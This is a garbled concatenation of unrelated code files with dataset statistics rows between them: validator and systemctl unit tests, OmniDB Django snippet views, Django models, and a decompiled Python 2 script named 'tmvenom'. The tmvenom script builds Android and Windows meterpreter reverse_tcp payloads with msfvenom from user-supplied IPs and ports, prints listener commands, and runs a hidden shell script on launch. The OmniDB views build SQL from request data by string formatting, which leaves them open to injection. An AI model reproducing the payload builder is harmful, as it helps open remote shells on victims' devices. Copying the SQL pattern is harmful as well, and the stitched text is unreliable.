valid({"test": "test", "foo": "bar"})
assert valid({"test": "test", "cat": "dog"})
assert valid({"test": "test", "dog": "cat"})
def test_has_nested_or_and():
valid = Query.has("test").or_("cat").and_("dog")
with pytest.raises(QueryValidationError):
valid({})
with pytest.raises(QueryValidationError):
valid({"dog": "cat"})
with pytest.raises(QueryValidationError):
valid({"cat": "dog"})
assert valid({"test": "test"})
assert valid({"dog": "cat", "cat": "dog"})
def test_can_have_nested_and_or():
valid = Query.can_have("test").and_("cat").or_("dog")
with pytest.raises(QueryValidationError):
valid({"test": "test"})
with pytest.raises(QueryValidationError):
valid({"cat": "dog"})
with pytest.raises(QueryValidationError):
valid({"dog": "cat"})
assert valid({})
assert valid({"test": "test", "dog": "cat"})
assert valid({"test": "test", "cat": "dog"})
assert valid({"test": "test", "dog": "cat", "cat": "dog"})
def test_can_have_nested_or_and():
valid = Query.can_have("test").or_("cat").and_("dog")
with pytest.raises(QueryValidationError):
valid({"dog": "cat"})
with pytest.raises(QueryValidationError):
valid({"cat": "dog"})
assert valid({})
assert valid({"test": "test"})
assert valid({"dog": "cat", "cat": "dog"})
assert valid({"test": "test", "foo": "bar"})
assert valid({"test": "test", "cat": "dog"})
assert valid({"test": "test", "dog": "cat"})
assert valid({"test": "test", "dog": "cat", "cat": "dog"})
def test_also():
valid = Query.has("test").also.has("dog").also.has("foo")
with pytest.raises(QueryValidationError):
valid({})
with pytest.raises(QueryValidationError):
valid({"test": "test"})
with pytest.raises(QueryValidationError):
valid({"dog": "cat"})
with pytest.raises(QueryValidationError):
valid({"foo": "bar"})
with pytest.raises(QueryValidationError):
valid({"test": 0})
assert valid({"test": "test", "dog": "cat", "foo": "bar"})
def test_repeat_also():
with pytest.raises(QueryValidatorStructureError):
Query.has("test").also.also
def test_default():
valid = Query.can_have("test").with_default("test")
query = {}
assert valid(query)
assert query == {"test": "test"}
def test_bad_default():
with pytest.raises(QueryValidatorStructureError):
Query.has("test").with_default("test")
def test_wrong_default_type():
valid = Query.can_have("test").with_default("test")
with pytest.raises(QueryValidationError):
valid({"test": 1})
def test_no_default_type():
valid = Query.can_have("test").with_default("test")
query = {"test": "dog"}
assert valid(query)
assert query == {"test": "dog"}
def test_default_supplier():
x = 0
def supplier(query, context):
nonlocal x
x += 1
return "test"
valid = Query.can_have("test").with_default(supplier, str)
query = {"test": "dog"}
assert valid(query)
assert query == {"test": "dog"}
assert x == 0
with pytest.raises(QueryValidationError):
valid({"test": 1})
assert x == 0
query = {}
assert valid(query)
assert query == {"test": "test"}
assert x == 1
query = {}
assert valid(query)
assert query == {"test": "test"}
assert x == 2
def test_validate_decorator():
def pre_transform(query):
if "test0" in query:
query["test1"] = query["test0"]
def pre_transform2(query):
if "test1" in query:
query["test2"] = int(query["test1"])
validator = Query.has("test1").as_(str).also.has("test2").as_(int)
@validate_query(validator, pre_transform, pre_transform2)
def get(self, query, context=None):
return query["test2"]
with pytest.raises(QueryValidationError):
get(None, {"cat": "dog"})
with pytest.raises(ValueError):
get(None, {"test1": "one"})
assert get(None, {"test0": "1"}) == 1
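# Hedged illustration (mirrors the patterns exercised above; the names are
# ours, not from the suite): a validator that requires "region" as str and
# fills in an optional "limit" with a default.
#
#   validator = Query.has("region").as_(str).also.can_have("limit").with_default(10)
#   q = {"region": "NA"}
#   assert validator(q)
#   assert q == {"region": "NA", "limit": 10}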
| 25.658537
| 99
| 0.608292
| 1,627
| 13,676
| 4.975415
| 0.036263
| 0.106238
| 0.169981
| 0.31575
| 0.904138
| 0.880791
| 0.857072
| 0.804077
| 0.780852
| 0.756269
| 0
| 0.008053
| 0.201009
| 13,676
| 532
| 100
| 25.706767
| 0.732772
| 0
| 0
| 0.717143
| 0
| 0
| 0.101199
| 0
| 0
| 0
| 0
| 0
| 0.271429
| 1
| 0.111429
| false
| 0
| 0.005714
| 0.002857
| 0.122857
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
904eedf1ccbd7ef50bd20c023fb29d448a0583e1
| 1,702
|
py
|
Python
|
test/test_systemctl_reload-or-restart.py
|
desdotdev/sysvkit
|
c055966aaa99794c930e32b658e31e991088c44a
|
[
"Apache-2.0"
] | 7
|
2022-03-30T14:33:39.000Z
|
2022-03-31T21:45:41.000Z
|
test/test_systemctl_reload-or-restart.py
|
desdotdev/sysvkit
|
c055966aaa99794c930e32b658e31e991088c44a
|
[
"Apache-2.0"
] | null | null | null |
test/test_systemctl_reload-or-restart.py
|
desdotdev/sysvkit
|
c055966aaa99794c930e32b658e31e991088c44a
|
[
"Apache-2.0"
] | 3
|
2022-03-30T09:27:47.000Z
|
2022-03-30T14:32:30.000Z
|
# systemctl reload-or-restart: successful reload.
def test_systemctl_reload_or_restart_ok(sysvenv):
service = sysvenv.create_service("foo")
service.direct_enable()
service.will_do("reload", 0)
out, err, status = service.invoke("reload-or-restart")
assert status == 0
assert not service.did("status")
assert service.did("reload")
assert not service.did("restart")
# systemctl reload-or-restart: the service is not running.
def test_systemctl_reload_or_restart_stopped(sysvenv):
service = sysvenv.create_service("foo")
service.direct_enable()
service.will_do("reload", 7)
service.will_do("restart", 0)
out, err, status = service.invoke("reload-or-restart")
assert status == 0
assert not service.did("status")
assert service.did("reload")
assert service.did("restart")
# systemctl reload-or-restart: reload is unsupported.
def test_systemctl_reload_or_restart_unsup(sysvenv):
service = sysvenv.create_service("foo")
service.direct_enable()
service.will_do("reload", 3)
service.will_do("restart", 0)
out, err, status = service.invoke("reload-or-restart")
assert status == 0
assert not service.did("status")
assert service.did("reload")
assert service.did("restart")
# systemctl reload-or-restart: both commands failed.
def test_systemctl_reload_or_restart_fail(sysvenv):
service = sysvenv.create_service("foo")
service.direct_enable()
service.will_do("reload", 3)
service.will_do("restart", 1)
out, err, status = service.invoke("reload-or-restart")
assert status == 1
assert not service.did("status")
assert service.did("reload")
assert service.did("restart")
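# Note on the exit codes exercised above: these tests appear to follow LSB
# init-script conventions, where 0 = success, 3 = unimplemented action, and
# 7 = program is not running. reload-or-restart therefore falls back to
# restart when reload reports 3 or 7, and only fails when the fallback
# restart itself fails (the last test).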
| 34.04
| 58
| 0.710928
| 225
| 1,702
| 5.222222
| 0.164444
| 0.081702
| 0.153191
| 0.163404
| 0.895319
| 0.895319
| 0.789787
| 0.754894
| 0.754894
| 0.754894
| 0
| 0.007703
| 0.160987
| 1,702
| 49
| 59
| 34.734694
| 0.815126
| 0.121622
| 0
| 0.769231
| 0
| 0
| 0.134899
| 0
| 0
| 0
| 0
| 0
| 0.410256
| 1
| 0.102564
| false
| 0
| 0
| 0
| 0.102564
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
90631e8dec3aa5dff016f85b27cd5e9e8efec9d6
| 8,373
|
py
|
Python
|
OmniDB/OmniDB_app/views/tree_snippets.py
|
swipswaps/OmniDB
|
03d2d791c50455176d20bc3513a48ff584164439
|
[
"MIT"
] | 1
|
2019-05-29T19:46:28.000Z
|
2019-05-29T19:46:28.000Z
|
OmniDB/OmniDB_app/views/tree_snippets.py
|
swipswaps/OmniDB
|
03d2d791c50455176d20bc3513a48ff584164439
|
[
"MIT"
] | null | null | null |
OmniDB/OmniDB_app/views/tree_snippets.py
|
swipswaps/OmniDB
|
03d2d791c50455176d20bc3513a48ff584164439
|
[
"MIT"
] | 1
|
2019-03-11T06:57:43.000Z
|
2019-03-11T06:57:43.000Z
|
from django.http import HttpResponse
from django.template import loader
from django.http import JsonResponse
from django.core import serializers
import json
import sys
import OmniDB_app.include.Spartacus as Spartacus
import OmniDB_app.include.Spartacus.Database as Database
import OmniDB_app.include.Spartacus.Utils as Utils
from OmniDB_app.include.Session import Session
def get_node_children(request):
v_return = {}
v_return['v_data'] = ''
v_return['v_error'] = False
v_return['v_error_id'] = -1
#Invalid session
if not request.session.get('omnidb_session'):
v_return['v_error'] = True
v_return['v_error_id'] = 1
return JsonResponse(v_return)
v_session = request.session.get('omnidb_session')
json_object = json.loads(request.POST.get('data', None))
v_sn_id_parent = json_object['p_sn_id_parent']
if not v_sn_id_parent:
v_filter = ' is null'
else:
v_filter = ' = {0}'.format(v_sn_id_parent)
v_return['v_data'] = {
'v_list_nodes': [],
'v_list_texts': []
}
try:
#Child nodes
v_child_nodes = v_session.v_omnidb_database.v_connection.Query('''
select sn_id, sn_name
from snippets_nodes
where user_id = {0}
and sn_id_parent {1}
'''.format(v_session.v_user_id,v_filter))
for v_node in v_child_nodes.Rows:
v_node_data = {
'v_id': v_node['sn_id'],
'v_name': v_node['sn_name']
}
v_return['v_data']['v_list_nodes'].append(v_node_data)
#Child texts
v_child_texts = v_session.v_omnidb_database.v_connection.Query('''
select st_id, st_name
from snippets_texts
where user_id = {0}
and sn_id_parent {1}
'''.format(v_session.v_user_id,v_filter))
for v_text in v_child_texts.Rows:
v_text_data = {
'v_id': v_text['st_id'],
'v_name': v_text['st_name']
}
v_return['v_data']['v_list_texts'].append(v_text_data)
except Exception as exc:
v_return['v_data'] = str(exc)
v_return['v_error'] = True
return JsonResponse(v_return)
return JsonResponse(v_return)
def get_snippet_text(request):
v_return = {}
v_return['v_data'] = ''
v_return['v_error'] = False
v_return['v_error_id'] = -1
#Invalid session
if not request.session.get('omnidb_session'):
v_return['v_error'] = True
v_return['v_error_id'] = 1
return JsonResponse(v_return)
v_session = request.session.get('omnidb_session')
json_object = json.loads(request.POST.get('data', None))
v_st_id = json_object['p_st_id']
try:
v_return['v_data'] = v_session.v_omnidb_database.v_connection.ExecuteScalar('''
select st_text
from snippets_texts
where st_id = {0}
'''.format(v_st_id))
except Exception as exc:
v_return['v_data'] = str(exc)
v_return['v_error'] = True
return JsonResponse(v_return)
return JsonResponse(v_return)
def new_node_snippet(request):
v_return = {}
v_return['v_data'] = ''
v_return['v_error'] = False
v_return['v_error_id'] = -1
#Invalid session
if not request.session.get('omnidb_session'):
v_return['v_error'] = True
v_return['v_error_id'] = 1
return JsonResponse(v_return)
v_session = request.session.get('omnidb_session')
json_object = json.loads(request.POST.get('data', None))
v_sn_id_parent = json_object['p_sn_id_parent']
v_mode = json_object['p_mode']
v_name = json_object['p_name']
if not v_sn_id_parent:
v_sn_id_parent = 'null'
try:
if v_mode == 'node':
v_session.v_omnidb_database.v_connection.Execute('''
insert into snippets_nodes values (
(select coalesce(max(sn_id), 0) + 1 from snippets_nodes),'{0}',{1},'','',{2})
'''.format(v_name,v_session.v_user_id,v_sn_id_parent))
else:
v_session.v_omnidb_database.v_connection.Execute('''
insert into snippets_texts values (
(select coalesce(max(st_id), 0) + 1 from snippets_texts),'{0}','','','',{1},{2})
'''.format(v_name,v_sn_id_parent,v_session.v_user_id))
except Exception as exc:
v_return['v_data'] = str(exc)
v_return['v_error'] = True
return JsonResponse(v_return)
v_return['v_data'] = ''
return JsonResponse(v_return)
def delete_node_snippet(request):
v_return = {}
v_return['v_data'] = ''
v_return['v_error'] = False
v_return['v_error_id'] = -1
#Invalid session
if not request.session.get('omnidb_session'):
v_return['v_error'] = True
v_return['v_error_id'] = 1
return JsonResponse(v_return)
v_session = request.session.get('omnidb_session')
json_object = json.loads(request.POST.get('data', None))
v_id = json_object['p_id']
v_mode = json_object['p_mode']
try:
if v_mode == 'node':
v_session.v_omnidb_database.v_connection.Execute('''
delete
from snippets_nodes
where sn_id = {0}
'''.format(v_id))
else:
v_session.v_omnidb_database.v_connection.Execute('''
delete
from snippets_texts
where st_id = {0}
'''.format(v_id))
except Exception as exc:
v_return['v_data'] = str(exc)
v_return['v_error'] = True
return JsonResponse(v_return)
v_return['v_data'] = ''
return JsonResponse(v_return)
def save_snippet_text(request):
v_return = {}
v_return['v_data'] = ''
v_return['v_error'] = False
v_return['v_error_id'] = -1
#Invalid session
if not request.session.get('omnidb_session'):
v_return['v_error'] = True
v_return['v_error_id'] = 1
return JsonResponse(v_return)
v_session = request.session.get('omnidb_session')
json_object = json.loads(request.POST.get('data', None))
v_id = json_object['p_id']
v_name = json_object['p_name']
v_text = json_object['p_text']
try:
#new snippet
if not v_id:
v_session.v_omnidb_database.v_connection.Execute('''
insert into snippets_texts values (
(select coalesce(max(st_id), 0) + 1 from snippets_texts),'{0}','{1}','','',null,{2})
'''.format(v_name,v_text.replace("'", "''"),v_session.v_user_id))
#existing snippet
else:
v_session.v_omnidb_database.v_connection.Execute('''
update snippets_texts
set st_text = '{0}'
where st_id = {1}
'''.format(v_text.replace("'", "''"),v_id))
except Exception as exc:
v_return['v_data'] = str(exc)
v_return['v_error'] = True
return JsonResponse(v_return)
v_return['v_data'] = ''
return JsonResponse(v_return)
def rename_node_snippet(request):
v_return = {}
v_return['v_data'] = ''
v_return['v_error'] = False
v_return['v_error_id'] = -1
#Invalid session
if not request.session.get('omnidb_session'):
v_return['v_error'] = True
v_return['v_error_id'] = 1
return JsonResponse(v_return)
v_session = request.session.get('omnidb_session')
json_object = json.loads(request.POST.get('data', None))
v_id = json_object['p_id']
v_name = json_object['p_name']
v_mode = json_object['p_mode']
try:
#node
if v_mode=='node':
v_session.v_omnidb_database.v_connection.Execute('''
update snippets_nodes
set sn_name = '{0}'
where sn_id = {1}
'''.format(v_name,v_id))
#snippet
else:
v_session.v_omnidb_database.v_connection.Execute('''
update snippets_texts
set st_name = '{0}'
where st_id = {1}
'''.format(v_name,v_id))
except Exception as exc:
v_return['v_data'] = str(exc)
v_return['v_error'] = True
return JsonResponse(v_return)
v_return['v_data'] = ''
return JsonResponse(v_return)
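# Hedged hardening note (not from the original source): every query above
# interpolates request-supplied values with str.format, which is SQL-injection
# prone. If the Spartacus connection layer supports parameter binding, a safer
# shape would be roughly:
#
#   v_session.v_omnidb_database.v_connection.Execute(
#       'update snippets_texts set st_name = ? where st_id = ?',
#       (v_name, v_id))
#
# The placeholder style and Execute signature here are assumptions; treat this
# as a pattern to verify against the driver, not a drop-in replacement.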
| 29.378947
| 100
| 0.59668
| 1,135
| 8,373
| 4.05022
| 0.079295
| 0.112682
| 0.114858
| 0.084838
| 0.831412
| 0.788993
| 0.777029
| 0.719817
| 0.719817
| 0.686535
| 0
| 0.00679
| 0.278873
| 8,373
| 284
| 101
| 29.482394
| 0.754554
| 0.017915
| 0
| 0.723005
| 0
| 0.014085
| 0.270247
| 0.014371
| 0
| 0
| 0
| 0
| 0
| 1
| 0.028169
| false
| 0
| 0.046948
| 0
| 0.159624
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
906e16682f09e909f60faa5ee64cddeee2a6081b
| 848
|
py
|
Python
|
backend/home/models.py
|
crowdbotics-apps/social-33092
|
07d67d0c485266b830f147a4f77027e445bca309
|
[
"FTL",
"AML",
"RSA-MD"
] | null | null | null |
backend/home/models.py
|
crowdbotics-apps/social-33092
|
07d67d0c485266b830f147a4f77027e445bca309
|
[
"FTL",
"AML",
"RSA-MD"
] | null | null | null |
backend/home/models.py
|
crowdbotics-apps/social-33092
|
07d67d0c485266b830f147a4f77027e445bca309
|
[
"FTL",
"AML",
"RSA-MD"
] | null | null | null |
from django.conf import settings
from django.db import models
class Teacher(models.Model):
"Generated Model"
name = models.CharField(
max_length=256,
)
email = models.EmailField(
max_length=254,
)
class Student(models.Model):
"Generated Model"
name = models.CharField(
max_length=256,
)
email = models.EmailField(
max_length=254,
)
phone = models.DecimalField(
max_digits=30,
decimal_places=10,
)
class Login(models.Model):
"Generated Model"
email = models.EmailField(
max_length=254,
)
password = models.CharField(
max_length=256,
)
class Signup(models.Model):
"Generated Model"
email = models.EmailField(
max_length=254,
)
password = models.CharField(
max_length=256,
)
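# Hedged usage sketch (the module path 'home.models' is assumed from the file
# location): exercising the generated models from a Django shell.
#
#   from home.models import Student
#   Student.objects.create(name='Ada', email='ada@example.com',
#                          phone='15551234567')
#   Student.objects.filter(email__iendswith='@example.com').count()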
| 18.042553
| 32
| 0.613208
| 91
| 848
| 5.604396
| 0.32967
| 0.141176
| 0.156863
| 0.196078
| 0.713725
| 0.713725
| 0.713725
| 0.713725
| 0.713725
| 0.713725
| 0
| 0.046512
| 0.290094
| 848
| 46
| 33
| 18.434783
| 0.800664
| 0.074292
| 0
| 0.526316
| 1
| 0
| 0.070755
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0.052632
| 0.052632
| 0
| 0.394737
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 8
|
909bb82026a323d4f0adb7e8d9292dec8f6a2762
| 25,438
|
py
|
Python
|
tmvenom/tmvenom2_dec.py
|
shyamjangid07/Reverse-Engineering
|
469efabcd6057f7895d8d891f1fabdf2ffe730b0
|
[
"Apache-2.0"
] | 337
|
2020-08-15T12:22:14.000Z
|
2022-03-29T06:05:15.000Z
|
tmvenom/tmvenom2_dec.py
|
Wh014M/Reverse-Engineering
|
f7aae2c43f7ea4a6730964d085c07814b6660a53
|
[
"Apache-2.0"
] | 3
|
2020-11-12T14:30:48.000Z
|
2021-05-18T16:56:22.000Z
|
tmvenom/tmvenom2_dec.py
|
Wh014M/Reverse-Engineering
|
f7aae2c43f7ea4a6730964d085c07814b6660a53
|
[
"Apache-2.0"
] | 83
|
2020-08-15T00:22:58.000Z
|
2022-03-31T08:40:23.000Z
|
# Decompiled by HTR-TECH | TAHMID RAYAT
# Github : https://github.com/htr-tech
#---------------------------------------
# Auto Dis Parser 2.2.0
# Source File : patched.pyc
# Bytecode Version : 2.7
#---------------------------------------
import os
import sys
import colorama
from colorama import *
import time
red = '\x1b[1;91m'
green = '\x1b[1;92m'
yellow = '\x1b[1;93m'
blue = '\x1b[1;94m'
purple = '\x1b[1;95m'
cyan = '\x1b[1;96m'
white = '\x1b[1;97m'
os.system('clear')
os.system('sh /data/data/com.termux/files/home/tmvenom/core/run2')
os.system('clear')
def pt():
print ''
def logo():
print '\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x95\x97\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x95\x97 \xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x95\x97\xe2\x96\x88\xe2\x96\x88\xe2\x95\x97 \xe2\x96\x88\xe2\x96\x88\xe2\x95\x97\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x95\x97\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x95\x97 \xe2\x96\x88\xe2\x96\x88\xe2\x95\x97 \xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x95\x97 \xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x95\x97 \xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x95\x97'
print '\xe2\x95\x9a\xe2\x95\x90\xe2\x95\x90\xe2\x96\x88\xe2\x96\x88\xe2\x95\x94\xe2\x95\x90\xe2\x95\x90\xe2\x95\x9d\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x95\x97 \xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x95\x91\xe2\x96\x88\xe2\x96\x88\xe2\x95\x91 \xe2\x96\x88\xe2\x96\x88\xe2\x95\x91\xe2\x96\x88\xe2\x96\x88\xe2\x95\x94\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x9d\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x95\x97 \xe2\x96\x88\xe2\x96\x88\xe2\x95\x91\xe2\x96\x88\xe2\x96\x88\xe2\x95\x94\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x96\x88\xe2\x96\x88\xe2\x95\x97\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x95\x97 \xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x95\x91'
print ' \xe2\x96\x88\xe2\x96\x88\xe2\x95\x91 \xe2\x96\x88\xe2\x96\x88\xe2\x95\x94\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x95\x94\xe2\x96\x88\xe2\x96\x88\xe2\x95\x91\xe2\x96\x88\xe2\x96\x88\xe2\x95\x91 \xe2\x96\x88\xe2\x96\x88\xe2\x95\x91\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x95\x97 \xe2\x96\x88\xe2\x96\x88\xe2\x95\x94\xe2\x96\x88\xe2\x96\x88\xe2\x95\x97 \xe2\x96\x88\xe2\x96\x88\xe2\x95\x91\xe2\x96\x88\xe2\x96\x88\xe2\x95\x91 \xe2\x96\x88\xe2\x96\x88\xe2\x95\x91\xe2\x96\x88\xe2\x96\x88\xe2\x95\x94\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x95\x94\xe2\x96\x88\xe2\x96\x88\xe2\x95\x91'
print ' \xe2\x96\x88\xe2\x96\x88\xe2\x95\x91 \xe2\x96\x88\xe2\x96\x88\xe2\x95\x91\xe2\x95\x9a\xe2\x96\x88\xe2\x96\x88\xe2\x95\x94\xe2\x95\x9d\xe2\x96\x88\xe2\x96\x88\xe2\x95\x91\xe2\x95\x9a\xe2\x96\x88\xe2\x96\x88\xe2\x95\x97 \xe2\x96\x88\xe2\x96\x88\xe2\x95\x94\xe2\x95\x9d\xe2\x96\x88\xe2\x96\x88\xe2\x95\x94\xe2\x95\x90\xe2\x95\x90\xe2\x95\x9d \xe2\x96\x88\xe2\x96\x88\xe2\x95\x91\xe2\x95\x9a\xe2\x96\x88\xe2\x96\x88\xe2\x95\x97\xe2\x96\x88\xe2\x96\x88\xe2\x95\x91\xe2\x96\x88\xe2\x96\x88\xe2\x95\x91 \xe2\x96\x88\xe2\x96\x88\xe2\x95\x91\xe2\x96\x88\xe2\x96\x88\xe2\x95\x91\xe2\x95\x9a\xe2\x96\x88\xe2\x96\x88\xe2\x95\x94\xe2\x95\x9d\xe2\x96\x88\xe2\x96\x88\xe2\x95\x91'
print ' \xe2\x96\x88\xe2\x96\x88\xe2\x95\x91 \xe2\x96\x88\xe2\x96\x88\xe2\x95\x91 \xe2\x95\x9a\xe2\x95\x90\xe2\x95\x9d \xe2\x96\x88\xe2\x96\x88\xe2\x95\x91 \xe2\x95\x9a\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x95\x94\xe2\x95\x9d \xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x95\x97\xe2\x96\x88\xe2\x96\x88\xe2\x95\x91 \xe2\x95\x9a\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x95\x91\xe2\x95\x9a\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x95\x94\xe2\x95\x9d\xe2\x96\x88\xe2\x96\x88\xe2\x95\x91 \xe2\x95\x9a\xe2\x95\x90\xe2\x95\x9d \xe2\x96\x88\xe2\x96\x88\xe2\x95\x91'
print ' \xe2\x95\x9a\xe2\x95\x90\xe2\x95\x9d \xe2\x95\x9a\xe2\x95\x90\xe2\x95\x9d \xe2\x95\x9a\xe2\x95\x90\xe2\x95\x9d \xe2\x95\x9a\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x9d \xe2\x95\x9a\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x9d\xe2\x95\x9a\xe2\x95\x90\xe2\x95\x9d \xe2\x95\x9a\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x9d \xe2\x95\x9a\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x9d \xe2\x95\x9a\xe2\x95\x90\xe2\x95\x9d \xe2\x95\x9a\xe2\x95\x90\xe2\x95\x9d'
print '\x1b[1;91m'
slowprint(' < Developed By \x1b[1;96m Technical Mujeeb' + ' \x1b[1;91m for Termux users >')
def auth():
print '\x1b[1;92m'
slowprint('Loading Author Information.....')
print '\x1b[1;92m'
slowprint('-------------------------------------------------------')
slowprint('|' + red + ' <=> ' + green + 'Name ' + red + '=' + cyan + ' Mujeeb ' + green + '|')
slowprint('|' + red + ' <=> ' + green + 'Youtube ' + red + '=' + cyan + ' www.youtube.com/technicalmujeeb ' + green + '|')
slowprint('|' + red + ' <=> ' + green + 'Github ' + red + '=' + cyan + ' https://github.com/TechnicalMujeeb ' + green + '|')
slowprint('|' + red + ' <=> ' + green + 'whatsapp ' + red + '=' + cyan + ' Termux Cyber ' + green + '|')
slowprint('|' + red + ' <=> ' + green + 'telegram ' + red + '=' + cyan + ' Termux Cyber [community] ' + green + '|')
slowprint('|' + red + ' <=> ' + green + 'Instagram ' + red + '=' + cyan + ' @Technical_Mujeeb ' + green + '|')
slowprint('-------------------------------------------------------')
print ''
again()
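# slowprint() emits the string one character at a time with a short delay,
# giving the banner and info text a typewriter effect.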
def slowprint(s):
for c in s + '\n':
sys.stdout.write(c)
sys.stdout.flush()
time.sleep(0.01)  # 1 / 100 is integer division (0) under Python 2; use a float delay
def again():
run = raw_input('\x1b[1;91m\n[e] \x1b[1;92mExit\x1b[1;96m or \x1b[1;91m[Enter]\x1b[1;92m to continue = \x1b[1;96m ')
if run == 'e':
slowprint('Exiting......')
print ''
else:
os.system('clear')
menu()
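# Each generator below follows the same flow: prompt for LHOST, LPORT and an
# output path, shell out to msfvenom, then optionally print the matching
# multi/handler commands and drop into msfconsole.
# Hedged hardening sketch (illustrative only, not wired into the flow): the
# prompts feed raw user input straight into os.system(), so a minimal sanity
# check like the hypothetical helper below would block shell metacharacters.
import re
def valid_target(ip, port):
    # loose IPv4 dotted-quad check plus a 1-65535 port range test
    if not re.match(r'^\d{1,3}(\.\d{1,3}){3}$', ip):
        return False
    return port.isdigit() and 0 < int(port) <= 65535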
def android():
pt()
print red + ' >> ' + cyan + 'Local IP for LAN, Public IP for WAN'
pt()
ip = raw_input(green + '[->] Ip Address = ')
print ''
print red + ' >> ' + cyan + 'recommended port = 4444'
pt()
por = raw_input(green + '[->] Port Number = ')
print ''
print red + ' >> ' + cyan + 'recommended path & name = /sdcard/mob.apk'
pt()
pay = raw_input(green + '[->] Payload path and Name = ')
pt()
print green + 'Generating payload.....'
pt()
os.system('msfvenom -p android/meterpreter/reverse_tcp LHOST=' + ip + ' LPORT=' + por + ' R > ' + pay)
print ''
print green + 'Successfully Generated'
print ''
yan = raw_input(yellow + ' Do you want to start the listener (y/n) => ')
if yan == 'y':
print ''
print cyan + '----------------COMMANDS FOR EXPLOIT---------------------'
print '\x1b[00m'
print Back.BLUE + ' copy and paste Below commands in msfconsole \x1b[00m '
print '\x1b[1;93m'
print ' use multi/handler'
print ' set payload android/meterpreter/reverse_tcp'
print ' set lhost {} =(\x1b[91mLocal IP\x1b[00m)'.format(ip)
print '\x1b[1;93m set lport {} '.format(por)
print ' exploit'
print ''
print cyan + '---------------------------------------------------------'
pt()
print 'PLEASE WAIT, MSFCONSOLE IS STARTING....'
os.system('service postgresql start')
os.system('msfconsole')
menu()
else:
menu()
def windows():
print red + ' >> ' + cyan + 'Local IP for LAN, Public IP for WAN'
print ''
ip = raw_input(green + '[->] Ip Address = ')
print ''
print red + ' >> ' + cyan + 'recommended port = 4444'
pt()
por = raw_input(green + '[->] Port = ')
print ''
print red + ' >> ' + cyan + 'recommended path & name = /sdcard/win.exe'
pt()
pay = raw_input(green + '[->] path and Name = ')
pt()
print cyan + 'Generating payload.....'
pt()
os.system('msfvenom -p windows/meterpreter/reverse_tcp LHOST=' + ip + ' LPORT=' + por + ' -f exe -a x86 > ' + pay)
pt()
print green + 'Successfully Generated'
pt()
yan = raw_input(yellow + ' Do you want to start the listener (y/n) => ')
if yan == 'y':
pt()
print Fore.CYAN + '----------------COMMANDS FOR EXPLOIT---------------------'
print '\x1b[00m'
print blue + ' copy and paste Below commands in msfconsole \x1b[00m '
print '\x1b[1;93m'
print ' use multi/handler'
print ' set payload windows/meterpreter/reverse_tcp'
print ' set lhost {} =(\x1b[91mLocal IP\x1b[00m)'.format(ip)
print '\x1b[1;93m set lport {} '.format(por)
print ' exploit'
pt()
print cyan + '---------------------------------------------------------'
pt()
print 'PLEASE WAIT, MSFCONSOLE IS STARTING....'
pt()
os.system('msfconsole')
menu()
else:
menu()
def mac():
print ''
